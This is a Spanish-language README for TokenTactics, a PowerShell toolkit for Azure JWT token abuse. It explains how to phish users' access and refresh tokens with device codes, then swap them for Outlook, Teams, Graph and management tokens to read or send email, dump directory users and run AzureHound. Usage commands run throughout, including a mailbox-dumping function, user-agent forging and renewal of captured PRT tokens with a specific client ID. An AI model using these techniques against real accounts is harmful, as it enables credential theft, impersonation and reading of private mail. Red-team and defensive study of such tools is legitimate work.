
Conjunto de herramientas de manipulación de tokens JWT de Azure
Conjunto de herramientas de manipulación de Tokens Web JSON ("JWT") de Azure
Los tokens de acceso de Azure permiten autenticarse en ciertos endpoints como un usuario que inicia sesión con un código de dispositivo. Incluso si usaron autenticación multifactor. Una vez que tienes el token de acceso de un usuario, es posible acceder a ciertas aplicaciones como Outlook, SharePoint, OneDrive, MSTeams y más.
Por ejemplo, si tienes un token de Graph o MSGraph, puedes conectarte a Azure y volcar usuarios, grupos, etc. Luego, dependiendo de las políticas de acceso condicional, puedes cambiar a un token de Azure Core Management y ejecutar AzureHound. Después, cambiar a un token de Outlook y leer/enviar correos electrónicos o MS Teams y leer/enviar mensajes!
Para más información sobre los tipos de tokens de Azure Tokens de acceso de la plataforma de identidad de Microsoft
Hay algunos ejemplos de solicitudes a endpoints en la carpeta resources. También hay una plantilla de phishing de ejemplo para phishing de código de dispositivo.
También puedes usar estos tokens con AAD Internals. Recomendamos encarecidamente que eches un vistazo a esta increíble herramienta.
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
Una vez que el usuario haya iniciado sesión, verás el JWT y se guardará en la variable $response. Para acceder al token de acceso usa $response.access_token desde tu ventana de PowerShell para mostrar el token. También puedes mostrar el token de actualización con $response.refresh_token. Consejo: ¡Querrás el token de actualización para seguir renovando a nuevos tokens de acceso! Por defecto, los resultados de Get-AzureToken se registran en TokenLog.log.
Get-AzureToken -Client DODMSGraph
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId [email protected]
Una vez que se haya capturado un PRT, autentícate con roadrecon para obtener tu access_token y refresh_token. Al renovar con TokenTactics, usa ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
Get-Command -Module TokenTactics
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-TenantID 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToO365SuiteUXToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
Los métodos de TokenTactics están fuertemente influenciados por la excelente investigación del Dr. Nestori Syynimaa en https://o365blog.com/.